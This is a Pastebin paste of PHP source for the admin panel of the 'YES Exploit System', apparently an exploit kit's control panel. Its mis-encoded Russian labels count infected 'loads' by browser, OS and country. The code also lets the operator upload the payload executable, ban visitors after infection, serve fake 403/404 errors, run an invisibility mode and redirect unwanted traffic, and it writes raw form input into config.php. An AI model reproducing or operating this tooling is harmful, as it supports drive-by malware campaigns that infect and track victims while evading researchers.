API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 19th, 2017
75
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.97 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. include '../config.php';
  4. include '../functions.php';
  5. $connect = mysql_connect($dbhost,$dbuser,$dbpass);
  6. mysql_select_db($dbname, $connect);
  7. _ecraned();
  8. include "./login.php";
  9. if(isset($_GET['do'])) $do = $_GET['do'];
  10. else $do = "";
  11. if($do == "")
  12. {
  13. echo "<html>\n";
  14. echo "<head>\n";
  15. echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=\"iso-8859-1\">\n";
  16. echo "<title>Admin-Panel</title>\n";
  17. echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"./css/ext-all.css\" />\n";
  18. echo "<script type=\"text/javascript\" src=\"./js/ext-base.js\"></script>\n";
  19. echo "<script type=\"text/javascript\" src=\"./js/ext-all.js\"></script>\n";
  20. echo "<script type=\"text/javascript\" src=\"js/StartMenu.js\"></script>\n";
  21. echo "<script type=\"text/javascript\" src=\"js/TaskBar.js\"></script>\n";
  22. echo "<script type=\"text/javascript\" src=\"js/Desktop.js\"></script>\n";
  23. echo "<script type=\"text/javascript\" src=\"js/App.js\"></script>\n";
  24. echo "<script type=\"text/javascript\" src=\"js/Module.js\"></script>\n";
  25. echo "<script type=\"text/javascript\" src=\"sample.php\"></script>\n";
  26. echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"css/desktop.css\" />\n";
  27. echo "</head>\n";
  28. echo "<body scroll=\"no\">\n";
  29. echo "<div id=\"x-desktop\">\n";
  30. echo "<dl id=\"x-shortcuts\">\n";
  31. echo "<dt id=\"acc-win-shortcut\">\n";
  32. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  33. echo "<div>Ńňŕňčńňčęŕ</div></a>\n";
  34. echo "</dt>\n";
  35. echo "<dt id=\"browsers-win-shortcut\">\n";
  36. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  37. echo "<div>Áđŕóçĺđű</div></a>\n";
  38. echo "</dt>\n";
  39. echo "<dt id=\"syst-win-shortcut\">\n";
  40. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  41. echo "<div>Ńčńňĺěű</div></a>\n";
  42. echo "</dt>\n";
  43. echo "<dt id=\"ip-win-shortcut\">\n";
  44. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  45. echo "<div>IP-ŕäđĺńŕ</div></a>\n";
  46. echo "</dt>\n";
  47. echo "<dt id=\"users-win-shortcut\">\n";
  48. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  49. echo "<div>Ńňđŕíű</div></a>\n";
  50. echo "</dt>\n";
  51. echo "<dt id=\"ref-win-shortcut\">\n";
  52. echo "<a href=\"#\"><img src=\"images/s.gif\" />\n";
  53. echo "<div>Đĺôĺđĺđű</div></a>\n";
  54. echo "</dt>\n";
  55. echo "</dt>\n";
  56. echo "</dl>\n";
  57. echo "</div>\n";
  58. echo "<div id=\"ux-taskbar\">\n";
  59. echo "<div id=\"ux-taskbar-start\"></div>\n";
  60. echo "<div id=\"ux-taskbuttons-panel\"></div>\n";
  61. echo "<div class=\"x-clear\"></div>\n";
  62. echo "</div>\n";
  63. echo "</body>\n";
  64. echo "</html>\n";
  65. }
  66. else if($do == "exit")
  67. {
  68. $fzp = md5_file('../exe/file.exe');
  69. $ffzp = fopen('../exe/log.dat',"w+");
  70. fwrite($ffzp,$fzp);
  71. fclose($ffzp);
  72. setcookie('login');
  73. setcookie('passw');
  74. session_destroy();
  75. header("Location: index.php");
  76. }
  77. else if($do == "cl")
  78. {
  79. db_query('DELETE FROM `os`');
  80. db_query('DELETE FROM `browsers`');
  81. db_query('DELETE FROM `lip`');
  82. db_query('DELETE FROM `countries`');
  83. db_query('DELETE FROM `referers`');
  84. db_query('DELETE FROM `tds`');
  85. db_query('DELETE FROM `traff`');
  86. db_query('DELETE FROM `brow`');
  87. $del1 = scandir('../etc/load/');
  88. for($i=0;$i<=count($del1);$i++)
  89. {
  90. if(eregi('.dat',$del1[$i])) unlink('../etc/load/'.$del1[$i]);
  91. }
  92. $del2 = scandir('../etc/sall/');
  93. for($i=0;$i<=count($del2);$i++)
  94. {
  95. if(eregi('.dat',$del2[$i])) unlink('../etc/sall/'.$del2[$i]);
  96. }
  97. header("Location: index.php");
  98. }
  99. else if ($do == 'pda')
  100. {
  101. ?>
  102. <center><b>YES Exploit System</b><br>Ńňŕňčńňčęŕ: Lite</center>
  103. <table align=center>
  104. <tr><td>
  105. <table align=left border=1>
  106. <tr><td>Áđŕóçĺđ </td><td>Ňđŕôčę </td><td>Çŕăđóçęč</td></tr>
  107. <?
  108. $sql = 'SELECT * FROM `browsers`';
  109. $res=mysql_query($sql, $connect);
  110. while ($row = mysql_fetch_assoc($res)) {
  111. ?>
  112. <tr><td><?=$row['name']; ?></td><td><?=$row['hits']; ?></td><td><?=$row['loads']; ?></td></tr>
  113. <?
  114. }
  115. ?>
  116. </table></td>
  117. <td><table align=center border=1>
  118. <tr><td>Ńčńňĺěŕ </td><td>Ňđŕôčę </td><td>Çŕăđóçęč</td></tr>
  119. <?
  120. $sql = 'SELECT * FROM `os`';
  121. $res=mysql_query($sql, $connect);
  122. while ($row = mysql_fetch_assoc($res)) {
  123. ?>
  124. <tr><td><?=$row['name']; ?></td><td><?=$row['hits']; ?></td><td><?=$row['loads']; ?></td></tr>
  125. <?
  126. }
  127. ?>
  128. </table></td>
  129. <td>
  130. <table align=right border=1>
  131. <tr><td>Ńňđŕíŕ </td><td>Ňđŕôčę </td><td>Çŕăđóçęč</td></tr>
  132. <?
  133. $sql = 'SELECT * FROM `countries`';
  134. $res=mysql_query($sql, $connect);
  135. while ($row = mysql_fetch_assoc($res)) {
  136. if($row['name'] == 'O1') $row['name'] = '--';
  137. ?>
  138. <tr><td><?=$row['name']; ?></td><td><?=$row['hits']; ?></td><td><?=$row['loads']; ?></td></tr>
  139. <?
  140. }
  141. ?>
  142. </table></td></tr></table><br><br>
  143. <?
  144. $sql = 'SELECT sum(`hits`) FROM `countries` WHERE 1';
  145. $res=mysql_query($sql, $connect);
  146. $res=mysql_fetch_assoc($res);
  147. $total=$res['sum(`hits`)'];
  148. $sql = 'SELECT sum(`loads`) FROM `countries` WHERE 1';
  149. $res=mysql_query($sql, $connect);
  150. $res=mysql_fetch_assoc($res);
  151. $loads=$res['sum(`loads`)'];
  152. ?>
  153. <center><b>Âńĺăî ňđŕôčęŕ:</b> <?=$total; ?><br><b>Âńĺăî çŕăđóçîę:</b> <?=$loads; ?></center>
  154. <?
  155. }
  156. else if ($do == 'options') {
  157. error_reporting(0);
  158. $dbh = $_POST['o1'];
  159. if(empty($dbh)) $dbh = $dbhost;
  160. $dbn = $_POST['o2'];
  161. if(empty($dbn)) $dbn = $dbname;
  162. $dbu = $_POST['o3'];
  163. if(empty($dbu)) $dbu = $dbuser;
  164. $dbp = $_POST['o4'];
  165. if(empty($dbp)) $dbp = $dbpass;
  166. $adm = $_POST['o5'];
  167. if(empty($adm)) $adm = $r00t;
  168. $pw = $_POST['o6'];
  169. if(empty($pw)) $pw = $pwd;
  170. $b4n = $_POST['o7'];
  171. if(empty($b4n)) $b4n = $ban;
  172. $fk = $_POST['o8'];
  173. if(empty($fk)) $fk = $fake;
  174. $tr = $_POST['o9'];
  175. if(empty($tr)) $tr = $trash;
  176. $unun = $_POST['o10'];
  177. if(empty($unun)) $unun = $un_uniq;
  178. $cok = $_POST['o11'];
  179. if(empty($cok)) $cok = $cookie_time;
  180. $fil = $_POST['o13'];
  181. if(empty($inv)) $inv = $invisible;
  182. $pers = $_POST['o15'];
  183. if(empty($pers)) $pers = $percent;
  184. $ord = $_POST['o66'];
  185. if(empty($pers)) $ord = $ordure;
  186. if($_FILES["filename"]["size"] > 1024*3*1024) die("Đŕçěĺđ ôŕéëŕ ďđĺâűřŕĺň ňđč ěĺăŕáŕéňŕ!");
  187. if(copy($_FILES["filename"]["tmp_name"],
  188. "../exe/".$_FILES["filename"]["name"]))
  189. {
  190. $file_cop = 'Ôŕéë óńďĺříî çŕăđóćĺí!<br>';
  191. }
  192. $fp = fopen('../config.php',"w+");
  193. fwrite($fp, '<?$dbhost = \''.$dbh.'\';$dbname = \''.$dbn.'\';$dbuser = \''.$dbu.'\';$dbpass = \''.$dbp.'\';$r00t = \''.$adm.'\';$pwd = \''.$pw.'\';$ban = \''.$b4n.'\';$fake = \''.$fk.'\';$trash = \''.$tr.'\';$un_uniq = \''.$unun.'\';$cookie_time = \''.$cok.'\';$invisible = \''.$inv.'\';$percent = \''.$pers.'\';$ordure = \''.$ord.'\'; ?>');
  194. fclose($fp);
  195. die('Íŕńňđîéęč ďđčěĺíĺíű!<br>'.$file_cop.'Íîâűĺ íŕńňđîéęč âńňóďčëč â ńčëó, đĺęîěĺíäóĺňń˙ îáíîâčňü ńňđŕíčöó.');
  196. }
  197. else if($do == 'opt') {
  198. ?>
  199. <html>
  200. <head>
  201. <link rel="stylesheet" type="text/css" href="./css/module.css">
  202. </head>
  203. <body bgcolor=ffffff>
  204. <table align=left class=tableBorder>
  205. <form action="?do=options" method=post enctype="multipart/form-data">
  206. <tr><td class="tableHeading">Íŕńňđîéęč:</td></tr>
  207. <tr><td class="tableHeading"><table>
  208. <tr><td>MySQL Host:</td><td><input type=text name=o1></td></tr>
  209. <tr><td>MySQL Base:</td><td><input type=text name=o2></td></tr>
  210. <tr><td>MySQL User:</td><td><input type=text name=o3></td></tr>
  211. <tr><td>MySQL Pass:</td><td><input type=text name=o4></td></tr>
  212. </table></td></tr>
  213. <tr><td class="tableHeading"><table>
  214. <tr><td>Ëîăčí:</td><td><input type=text name=o5></td></tr>
  215. <tr><td>Ďŕđîëü:</td><td><input type=text name=o6></td></tr>
  216. <tr><td>Ďđîáčâ:</td><td><select name=o15><option selected></option><option value=1>Îęđóăë˙ňü ę ěĺíüřĺěó</option><option value=2>Îęđóăë˙ňü ę áîëüřĺěó</option><option value=3>Äĺń˙ňč÷íűé đĺćčě</option></td></tr>
  217. </table></td></tr>
  218. <tr><td class="tableHeading"><table>
  219. <tr><td>Áŕí ďîńëĺ çŕăđóçęč:</td><td><select name=o7><option selected></option><option value=yes>Äŕ</option><option value=no>Íĺň</option></td></tr>
  220. <tr><td>Áŕí őîńňîâ â ÷ŕńŕő:</td><td><input type=text name=o11></td></tr>
  221. <tr><td>Ôĺéęîâŕ˙ îřčáęŕ:</td><td><select name=o8><option selected></option><option value=403>403</option><option value=404>404</option></td></tr>
  222. <tr><td>Đĺćčě íĺâčäčěęč:</td><td><select name=o14><option selected></option><option value=yes>Äŕ</option><option value=no>Íĺň</option></td></tr>
  223. </table></td></tr>
  224. <tr><td class="tableHeading"><table>
  225. <tr><td>URL äë˙ đĺäčđĺęňŕ âńĺő őîńňîâ:</td><td><input type=text name=o9></td></tr>
  226. <tr><td>URL äë˙ đĺäčđĺęňŕ ďîâňîđîâ:</td><td><input type=text name=o10></td></tr>
  227. <tr><td>Áëîę ěóńîđíîăî ňđŕôčęŕ yes\url:</td><td><input type=text name=o66></td></tr>
  228. <tr><td>Çŕăđóçčňü ôŕéë:</td><td> <input type="file" name="filename"></td></tr>
  229. </table></td></tr>
  230. <tr><td class="tableHeading"><input type=submit name=buton value="Ďđčěĺíčňü"></td></tr>
  231. </form>
  232. </table>
  233. <body>
  234. </html>
  235. <?
  236. }
  237. mysql_close($connect);
  238. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!